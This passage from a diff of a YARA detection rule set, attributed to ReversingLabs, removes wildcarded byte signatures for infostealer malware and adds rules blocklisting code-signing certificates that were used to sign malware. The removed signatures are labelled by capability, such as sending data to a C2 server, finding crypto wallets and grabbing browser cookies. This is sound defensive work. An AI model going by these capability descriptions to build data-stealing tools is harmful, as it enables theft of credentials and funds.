-            ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ??
-            ?? 50 B9 ?? ?? ?? ?? D1 E1 8B 91 ?? ?? ?? ?? FF D2 8B 45 ?? A3 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 6A ?? BA ?? ?? ?? ?? 6B C2
-        }
-		$collect_os_information_p2 = {
-            8B 88 ?? ?? ?? ?? FF D1 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF
-            D0 85 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? A3 ?? ??
-            ?? ?? 89 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ??
-            FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 4D ?? 51
-            6A ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? A3 ?? ?? ?? ?? 8B 4D ?? 89
-            0D ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 6A ?? B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
-            ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 83 7D ?? ?? 73 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB
-            ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 73 ?? 8B 45 ?? 0F B7 0C 45 ?? ?? ?? ?? 8B
-            55 ?? 0F B7 04 55 ?? ?? ?? ?? 3B C8 75 ?? 33 C9 8B 55 ?? 66 89 0C 55 ?? ?? ?? ?? EB
-            ?? EB ?? 5E 5B 8B E5 5D C3
-        }
-		$send_data_to_c2_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1
-            ?? 8B 82 ?? ?? ?? ?? FF D0 85 C0 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 6A ?? 6A ?? 0F BF 55 ?? 52 B8 ?? ?? ??
-            ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 6A ?? 6A
-            ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ??
-            6A ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
-            ?? ?? ?? EB ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 83 7D ?? ?? 7D ?? 8B 45 ?? 0F B7 8C 45 ??
-            ?? ?? ?? 83 F9 ?? 75 ?? 8B 55 ?? 0F B7 84 55 ?? ?? ?? ?? 83 F8 ?? 75 ?? EB ?? EB ??
-            8B 4D ?? 0F B7 94 4D ?? ?? ?? ?? 85 D2 74 ?? 8B 45 ?? 8B 4D ?? 8A 94 4D ?? ?? ?? ??
-            88 54 05 ?? 8B 45 ?? 0F BE 4C 05 ?? 83 F9 ?? 75 ?? 8B 55 ?? C6 44 15 ?? ?? EB ?? 8D
-            45 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 0F
-            B6 15 ?? ?? ?? ?? 83 FA ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8
-            ?? ?? ?? ?? C1 E0 ?? 8A 4D ?? 88 88 ?? ?? ?? ?? 0F B6 15 ?? ?? ?? ?? 83 FA ?? 75
-        }
-		$send_data_to_c2_p2 = {
-            C7 45 ?? ?? ?? ?? ?? EB ?? C7 45 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 55 ?? 88
-            91 ?? ?? ?? ?? 0F B6 05 ?? ?? ?? ?? 83 F8 ?? 75 ?? C7 45 ?? ?? ?? ?? ?? EB ?? C7 45
-            ?? ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ?? 8A 45 ?? 88 82 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B
-            D1 ?? C6 82 ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 6B C8 ?? 8A 15 ?? ?? ?? ?? 88 91 ?? ?? ??
-            ?? B8 ?? ?? ?? ?? 6B C8 ?? C6 81 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 85 D2 74 ?? 6A ?? 8D
-            45 ?? 50 8B 4D ?? 51 BA ?? ?? ?? ?? D1 E2 8B 82 ?? ?? ?? ?? FF D0 83 F8 ?? 74 ?? 6A
-            ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ??
-            ?? FF D1 83 F8 ?? 74 ?? 6A ?? 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 8B 4D ?? 51 BA ?? ??
-            ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 83 F8 ?? 74 ?? EB ?? 68 ?? ?? ?? ?? FF 15 ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 52 B8 ?? ?? ?? ?? C1 E0 ?? 8B 88 ?? ?? ?? ?? FF D1
-            BA ?? ?? ?? ?? 6B C2 ?? 8B 88 ?? ?? ?? ?? FF D1 B8 ?? ?? ?? ?? EB ?? 33 C0 8B E5 5D
-            C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ??
-            ?? 52 A1 ?? ?? ?? ?? 50 B9 ?? ?? ?? ?? 6B D1 ?? 8B 82 ?? ?? ?? ?? FF D0 89 45 ?? 8B
-            0D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 33 D2 8B 0D ?? ?? ?? ?? 66 89 54 41 ?? 83
-            7D ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 15 ??
-            ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ??
-            83 C4 ?? 0F B7 4D ?? 8D 54 08 ?? 81 FA ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 8B 0D ?? ?? ?? ?? 51 68 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 74 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 74 ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? B9
-            ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ??
-            ?? ?? ?? 66 89 4D ?? 33 D2 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
-        }
-		$find_files_p2 = {
-            89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA
-            ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
-            89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA
-            ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? 33 D2
-            66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66
-            89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8
-            ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0
-            66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66
-            89 45 ?? 33 C9 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9
-            ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0 66 89 45 ?? B9 ?? ?? ?? ??
-            66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66
-            89 4D ?? 33 D2 66 89 55 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 0F 85 ?? ?? ?? ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
-        }
-		$find_files_p3 = {
-            C0 0F 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 85 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ??
-            85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D
-            4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 45 ?? 50 8D 8D
-            ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 55 ?? 52 8D 85 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 4D ?? 51 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ??
-            83 C4 ?? 85 C0 74 ?? B8 ?? ?? ?? ?? 66 89 45 ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ??
-            ?? ?? 66 89 55 ?? B8 ?? ?? ?? ?? 66 89 45 ?? 33 C9 66 89 4D ?? 0F B7 15 ?? ?? ?? ??
-            A1 ?? ?? ?? ?? 8D 0C 50 51 8D 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 8B 4D ?? 51 8B 15 ?? ?? ?? ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8A 0D ??
-            ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 0F B7 55 ?? 33 C0 8B 0D ?? ?? ?? ?? 66 89 04 51
-            8D 95 ?? ?? ?? ?? 52 8B 45 ?? 50 B9 ?? ?? ?? ?? C1 E1 ?? 8B 91 ?? ?? ?? ?? FF D2 85
-            C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B E5 5D C2
-        }
-		$find_crypto_wallets_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ??
-            51 8B 55 ?? 52 B8 ?? ?? ?? ?? 6B C8 ?? 8B 91 ?? ?? ?? ?? FF D2 89 45 ?? 8B 45 ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 33 C9 8B 55 ?? 66 89 4C 42 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ??
-            ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 89 45 ?? 8D 8D ?? ?? ?? ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 0F B7 55 ?? 8D 44 10 ?? 3D ?? ?? ?? ?? 72 ?? E9 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 51 8B 55 ?? 52 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
-            ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? D1
-            E0 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B 8D ?? ?? ?? ?? 83 E1
-            ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85
-            C0 0F 84 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D
-            ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ??
-            B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 4D ?? BA ?? ?? ?? ?? 66 89 55 ?? 33 C0
-            66 89 45 ?? 8D 4D ?? 51 6A ?? 8D 95 ?? ?? ?? ?? 52 0F B7 45 ?? 50 8B 4D ?? 51 8B 55
-            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95
-        }
-		$find_crypto_wallets_2 = {
-            0D ?? ?? ?? ?? 80 C1 ?? 88 0D ?? ?? ?? ?? 83 7D ?? ?? 76 ?? 8A 15 ?? ?? ?? ?? 80 C2
-            ?? 88 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 25 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 83 3D ??
-            ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 86 ?? ?? ?? ??
-            B8 ?? ?? ?? ?? C1 E0 ?? 8B 4D ?? 0F B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ??
-            ?? 6B C8 ?? 8B 55 ?? 0F B6 04 0A 83 F8 ?? 0F 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 6B D1 ??
-            8B 45 ?? 0F B6 0C 10 83 F9 ?? 0F 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 0F
-            B6 14 01 83 FA ?? 0F 85 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ??
-            ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ?? B8 ?? ?? ?? ?? 66 89 85
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA ?? ?? ?? ?? 66 89 95 ?? ?? ?? ??
-            B8 ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? B9 ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? BA
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Robin Limited" and pe.signatures [ i ] . serial == "1b:24:8c:85:08:04:2d:36:bb:d5:d9:2d:18:9c:61:d8" and 1663171218 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "29cb9255-0a34-58e8-88b2-fad988c7d229"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10972-L10988"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "8d1435d2fa70db12cde2f9098e35ca1737f5aac36bac91329b28f03aad090e90"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $collect_os_information_p* ) ) and ( all of ( $send_data_to_c2_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $find_crypto_wallets_* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sunshine.com" and pe.signatures [ i ] . serial == "03:26:60:ee:1d:49:ad:35:08:60:27:47:3e:26:14:e5:e7:24" and 1660238245 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Infostealer_Gomorrahstealer : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects GomorrahStealer infostealer."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "f3c14d23-47a2-5b09-8f48-0c2f9350516a"
-		date = "2024-11-27"
-		modified = "2024-11-27"
+		id = "ac09f8ac-fbdd-5989-a7e7-07373a69213b"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/infostealer/ByteCode.MSIL.Infostealer.GomorrahStealer.yara#L1-L111"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "75d86ea2ef9f24487ef54979508170651cd60abba6daa4c3117e20a77bb3b086"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L10990-L11006"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "c29fb109c741437a3739f1c42aadace8f612ef1e3ea90e3e2bdd8a92c85e766a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "GomorrahStealer"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$get_browser_autofill_data = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
-            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
-            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26
-            08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 08 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ??
-            ?? 17 D6 80 ?? ?? ?? ?? 00 11 ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ??
-            17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00
-            11 ?? 28 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13
-            ?? 00 28 ?? ?? ?? ?? DE
-        }
-		$get_browser_cookies = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
-            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
-            13 ?? 38 ?? ?? ?? ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72
-            ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11
-            ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ??
-            11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ??
-            16 2B ?? 17 00 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 14 (FE | 01) ?? 13 ??
-            11 ?? 2C ?? 38 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 28 ?? ?? ?? ?? 13 ?? 00
-            08 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00 11 ?? 17 72 ?? ?? ?? ?? A2 00 11
-            ?? 18 11 ?? A2 00 11 ?? 19 72 ?? ?? ?? ?? A2 00 11 ?? 1A 11 ?? A2 00 11 ?? 1B 72 ??
-            ?? ?? ?? A2 00 11 ?? 1C 11 ?? A2 00 11 ?? 1D 72 ?? ?? ?? ?? A2 00 11 ?? 1E 11 ?? A2
-            00 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 17 D6 80 ?? ?? ?? ?? 00 11
-            ?? 17 D6 13 ?? 11 ?? 11 ?? 13 ?? 11 ?? 3E ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 ?? 11 ??
-            16 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? 08 6F ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE
-        }
-		$take_screenshot = {
-            12 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 28
-            ?? ?? ?? ?? 0A 06 12 ?? 16 16 28 ?? ?? ?? ?? 00 11 ?? 12 ?? 16 16 28 ?? ?? ?? ?? 00
-            11 ?? 08 6F ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 07 6F ?? ??
-            ?? ?? 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ??
-            28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE
-        }
-		$get_antivirus_information = {
-            7E ?? ?? ?? ?? 0B 00 28 ?? ?? ?? ?? 0D 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ??
-            1B (FE | 02) ?? 72 ?? ?? ?? ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ??
-            73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ??
-            13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 00 11 ?? 6F ?? ?? ?? ??
-            13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 74 ?? ?? ?? ?? 13 ?? 00 08 11 ?? 72 ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C DE ?? 28
-            ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 08 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 0C DE ?? 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 6F ?? ?? ?? ?? 13 ??
